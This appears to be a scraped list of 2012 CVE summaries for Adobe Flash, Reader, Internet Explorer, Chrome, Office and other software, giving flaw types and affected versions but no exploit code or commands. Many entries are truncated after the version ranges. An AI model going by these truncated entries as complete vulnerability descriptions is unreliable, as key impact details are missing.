11.1.115.20 on Android 4.x [CVE-2012-5280] Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5279] Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5278] Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5277] Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5276] Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5275] Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5274] Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5272] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5271] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5270] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5269] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5268] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5267] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5266] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5265] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5264] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5263] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5262] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5261] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5260] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5259] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5258] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5257] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5256] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5255] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5254] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5253] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5252] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5251] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5250] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5249] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5248] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5154] Integer overflow in Google Chrome before 24.0.1312.52 on Windows allows attackers to cause a denial of service or possibly have unspecified other impact via vectors related to allocation of shared memory. [CVE-2012-4969] Use-after-free vulnerability in the CMshtmlEd::Exec function in mshtml.dll in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site, as exploited in the wild in September 2012. [CVE-2012-4792] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly allocated or (2) is deleted, as demonstrated by a CDwnBindInfo object, and exploited in the wild in December 2012. [CVE-2012-4791] Microsoft Exchange Server 2007 SP3 and 2010 SP1 and SP2 allows remote authenticated users to cause a denial of service (Information Store service hang) by subscribing to a crafted RSS feed, aka "RSS Feed May Cause Exchange DoS Vulnerability." [CVE-2012-4787] Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly initialized or (2) is deleted, aka "Improper Ref Counting Use After Free Vulnerability." [CVE-2012-4782] Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "CMarkup Use After Free Vulnerability." [CVE-2012-4781] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "InjectHTMLStream Use After Free Vulnerability." [CVE-2012-4777] The code-optimization feature in the reflection implementation in Microsoft .NET Framework 4 and 4.5 does not properly enforce object permissions, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka "WPF Reflection Optimization Vulnerability." [CVE-2012-4776] The Web Proxy Auto-Discovery (WPAD) functionality in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not validate configuration data that is returned during acquisition of proxy settings, which allows remote attackers to execute arbitrary JavaScript code by providing crafted data during execution of (1) an XAML browser application (aka XBAP) or (2) a .NET Framework application, aka "Web Proxy Auto-Discovery Vulnerability." [CVE-2012-4775] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site, aka "CTreeNode Use After Free Vulnerability." [CVE-2012-4363] Multiple unspecified vulnerabilities in Adobe Reader through 10.1.4 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted PDF document, related to "sixteen more crashes affecting Windows, OS X, or both systems." [CVE-2012-4350] Multiple unquoted Windows search path vulnerabilities in the (1) Manager and (2) Agent components in Symantec Enterprise Security Manager (ESM) before 11.0 allow local users to gain privileges via unspecified vectors. [CVE-2012-4349] Unquoted Windows search path vulnerability in Symantec Network Access Control (SNAC) 12.1 before RU2 allows local users to gain privileges via unspecified vectors. [CVE-2012-4337] Foxit Reader before 5.3 on Windows XP and Windows 7 allows remote attackers to execute arbitrary code via a PDF document with a crafted attachment that triggers calculation of a negative number during processing of cross references. [CVE-2012-4206] Untrusted search path vulnerability in the installer in Mozilla Firefox before 17.0 and Firefox ESR 10.x before 10.0.11 on Windows allows local users to gain privileges via a Trojan horse DLL in the default downloads directory. [CVE-2012-4171] Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x [CVE-2012-4168] Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x [CVE-2012-4167] Integer overflow in Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x [CVE-2012-4165] Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x [CVE-2012-4164] Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x [CVE-2012-4163] Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x [CVE-2012-4160] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, and CVE-2012-4159. [CVE-2012-4159] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, and CVE-2012-4160. [CVE-2012-4158] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4157] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4156] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4155] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4154] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4153] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4152] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4151] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4150] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4149] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4148] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4147] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4145] Unspecified vulnerability in Opera before 12.01 on Windows and UNIX, and before 11.66 and 12.x before 12.01 on Mac OS X, has unknown impact and attack vectors, related to a "low severity issue." [CVE-2012-4144] Opera before 12.01 on Windows and UNIX, and before 11.66 and 12.x before 12.01 on Mac OS X, does not properly escape characters in DOM elements, which makes it easier for remote attackers to bypass cross-site scripting (XSS) protection mechanisms via a crafted HTML document. [CVE-2012-4143] Opera before 12.01 on Windows and UNIX, and before 11.66 and 12.x before 12.01 on Mac OS X, allows user-assisted remote attackers to trick users into downloading and executing arbitrary files via a small window for the download dialog, a different vulnerability than CVE-2012-1924. [CVE-2012-4142] Opera before 12.01 on Windows and UNIX, and before 11.66 and 12.x before 12.01 on Mac OS X, ignores some characters in HTML documents in unspecified circumstances, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via a crafted document. [CVE-2012-3974] Untrusted search path vulnerability in the installer in Mozilla Firefox before 15.0, Firefox ESR 10.x before 10.0.7, Thunderbird before 15.0, and Thunderbird ESR 10.x before 10.0.7 on Windows allows local users to gain privileges via a Trojan horse executable file in a root directory. [CVE-2012-3569] Format string vulnerability in VMware OVF Tool 2.1 on Windows, as used in VMware Workstation 8.x before 8.0.5, VMware Player 4.x before 4.0.5, and other products, allows user-assisted remote attackers to execute arbitrary code via a crafted OVF file. [CVE-2012-3456] Heap-based buffer overflow in the read function in filters/words/msword-odf/wv2/src/styles.cpp in the Microsoft import filter in Calligra 2.4.3 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted ODF style in an ODF document. NOTE: this is the same vulnerability as CVE-2012-3455, but it was SPLIT by the CNA even though Calligra and KOffice share the same codebase. [CVE-2012-3455] Heap-based buffer overflow in the read function in filters/words/msword-odf/wv2/src/styles.cpp in the Microsoft import filter in KOffice 2.3.3 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted ODF style in an ODF document. NOTE: this is the same vulnerability as CVE-2012-3456, but it was SPLIT by the CNA even though Calligra and KOffice share the same codebase. [CVE-2012-3324] Directory traversal vulnerability in the UTL_FILE module in IBM DB2 and DB2 Connect 10.1 before FP1 on Windows allows remote authenticated users to modify, delete, or read arbitrary files via a pathname in the file field. [CVE-2012-2972] The (1) server and (2) agent components in CA ARCserve Backup r12.5, r15, and r16 on Windows do not properly validate RPC requests, which allows remote attackers to cause a denial of service (service crash) via a crafted request. [CVE-2012-2971] The server in CA ARCserve Backup r12.5, r15, and r16 on Windows does not properly process RPC requests, which allows remote attackers to execute arbitrary code or cause a denial of service via a crafted request. [CVE-2012-2860] The date-picker implementation in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows user-assisted remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted web site. [CVE-2012-2858] Buffer overflow in the WebP decoder in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted WebP image. [CVE-2012-2857] Use-after-free vulnerability in the Cascading Style Sheets (CSS) DOM implementation in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted document. [CVE-2012-2856] The PDF functionality in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger out-of-bounds write operations. [CVE-2012-2855] Use-after-free vulnerability in the PDF functionality in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted document. [CVE-2012-2854] Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to obtain potentially sensitive information about pointer values by leveraging access to a WebUI renderer process. [CVE-2012-2853] The webRequest API in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, does not properly interact with the Chrome Web Store, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted web site. [CVE-2012-2852] The PDF functionality in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, does not properly handle object linkage, which allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via a crafted document. [CVE-2012-2851] Multiple integer overflows in the PDF functionality in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allow remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted document. [CVE-2012-2850] Multiple unspecified vulnerabilities in the PDF functionality in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allow remote attackers to have an unknown impact via a crafted document. [CVE-2012-2849] Off-by-one error in the GIF decoder in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted image. [CVE-2012-2848] The drag-and-drop implementation in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows user-assisted remote attackers to bypass intended file access restrictions via a crafted web site. [CVE-2012-2847] Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, does not request user confirmation before continuing a large series of downloads, which allows user-assisted remote attackers to cause a denial of service (resource consumption) via a crafted web site. [CVE-2012-2816] Google Chrome before 20.0.1132.43 on Windows does not properly isolate sandboxed processes, which might allow remote attackers to cause a denial of service (process interference) via unspecified vectors. [CVE-2012-2764] Untrusted search path vulnerability in Google Chrome before 20.0.1132.43 on Windows might allow local users to gain privileges via a Trojan horse Metro DLL in the current working directory. [CVE-2012-2557] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "cloneNode Use After Free Vulnerability." [CVE-2012-2552] Cross-site scripting (XSS) vulnerability in the SQL Server Report Manager in Microsoft SQL Server 2000 Reporting Services SP2 and SQL Server 2005 SP4, 2008 SP2 and SP3, 2008 R2 SP1, and 2012 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "Reflected XSS Vulnerability." [CVE-2012-2550] Microsoft Works 9 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted Word .doc file, aka "Works Heap Vulnerability." [CVE-2012-2549] The IP-HTTPS server in Windows Server 2008 R2 and R2 SP1 and Server 2012 does not properly validate certificates, which allows remote attackers to bypass intended access restrictions via a revoked certificate, aka "Revoked Certificate Bypass Vulnerability." [CVE-2012-2548] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Layout Use After Free Vulnerability." [CVE-2012-2546] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Event Listener Use After Free Vulnerability." [CVE-2012-2543] Stack-based buffer overflow in Microsoft Excel 2007 SP2 and SP3 and 2010 SP1 [CVE-2012-2539] Microsoft Word 2003 SP3, 2007 SP2 and SP3, and 2010 SP1 [CVE-2012-2536] Cross-site scripting (XSS) vulnerability in Microsoft Systems Management Server 2003 SP3 and System Center Configuration Manager 2007 SP2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Reflected XSS Vulnerability." [CVE-2012-2532] Microsoft FTP Service 7.0 and 7.5 for Internet Information Services (IIS) processes unspecified commands before TLS is enabled for a session, which allows remote attackers to obtain sensitive information by reading the replies to these commands, aka "FTP Command Injection Vulnerability." [CVE-2012-2531] Microsoft Internet Information Services (IIS) 7.5 uses weak permissions for the Operational log, which allows local users to discover credentials by reading this file, aka "Password Disclosure Vulnerability." [CVE-2012-2528] Use-after-free vulnerability in Microsoft Word 2003 SP3, 2007 SP2 and SP3, and 2010 SP1 [CVE-2012-2524] Microsoft Office 2007 SP2 and SP3 and 2010 SP1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Computer Graphics Metafile (CGM) file, aka "CGM File Format Memory Corruption Vulnerability." [CVE-2012-2523] Integer overflow in Microsoft Internet Explorer 8 and 9, JScript 5.8, and VBScript 5.8 on 64-bit platforms allows remote attackers to execute arbitrary code by leveraging an incorrect size calculation during object copying, aka "JavaScript Integer Overflow Remote Code Execution Vulnerability." [CVE-2012-2522] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a malformed virtual function table after this table's deletion, aka "Virtual Function Table Corruption Remote Code Execution Vulnerability." [CVE-2012-2521] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Asynchronous NULL Object Access Remote Code Execution Vulnerability." [CVE-2012-2519] Untrusted search path vulnerability in Entity Framework in ADO.NET in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, and 4 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .NET application, aka ".NET Framework Insecure Library Loading Vulnerability." [CVE-2012-2493] The VPN downloader implementation in the WebLaunch feature in Cisco AnyConnect Secure Mobility Client 2.x before 2.5 MR6 on Windows, and 2.x before 2.5 MR6 and 3.x before 3.0 MR8 on Mac OS X and Linux, does not properly validate binaries that are received by the downloader process, which allows remote attackers to execute arbitrary code via vectors involving (1) ActiveX or (2) Java components, aka Bug ID CSCtw47523. 